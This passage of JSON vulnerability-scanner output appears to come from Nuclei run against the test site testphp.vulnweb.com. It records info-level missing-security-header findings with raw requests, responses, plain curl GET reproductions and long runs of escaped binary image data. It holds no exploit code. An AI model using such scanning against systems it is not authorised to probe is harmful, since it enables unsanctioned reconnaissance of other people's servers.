07\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:31.542076181Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:32.073333477Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\